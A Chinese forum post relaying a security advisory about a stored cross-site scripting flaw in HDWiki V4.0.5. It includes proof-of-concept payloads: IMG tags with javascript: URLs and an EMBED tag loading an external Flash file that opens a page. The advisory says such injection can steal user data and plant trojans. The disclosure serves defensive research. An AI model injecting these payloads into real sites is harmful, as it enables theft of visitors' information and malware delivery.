最近看过此主题的会员

返回列表 发帖
HDWiki-V4.0.5-0day跨站漏洞
影响版本:HDWiki-V4.0.5危害程度:高危漏洞描述:安天实验室信息安全研究与应急处理中心(Antiy CERT)通过渗透测试发现HDWiki-V4.0.5这个版本在创建编辑词条时,对于里面HTML元素没有很好的过滤,导致可以持久性跨站并挂马,如果用户访问该类被攻击者修改过并插入恶意跨站代码的页面将可能导致盗取用户敏感信息、感染木马病毒等。 注:经测试此跨站漏洞对互动百科官方主站无效。测试环境:Windows XP SP2+IE6.0 & Windows XP SP3+IE8.0 测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!1、URL:http://10.0.6.139/wiki/index.php?doc-view-2XSSCode:<IMG SRC=javascript:alert('XSS')>
2、URL:http://10.0.6.139/wiki/index.php?doc-view-3XSSCode:<IMG SRC="javascript:alert('XSS');">
3、URL:http://10.0.6.139/wiki/index.php?doc-view-4XSSCode:<EMBED SRC="http://10.0.54.55/33.swf" AllowScriptAccess="always"></EMBED>http://10.0.54.55/33.swf  是一个Flash链接,Flash文件内部使用了弹网页的函数,所以只要Flash解析成功触发这个函数就会弹出一个网页


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表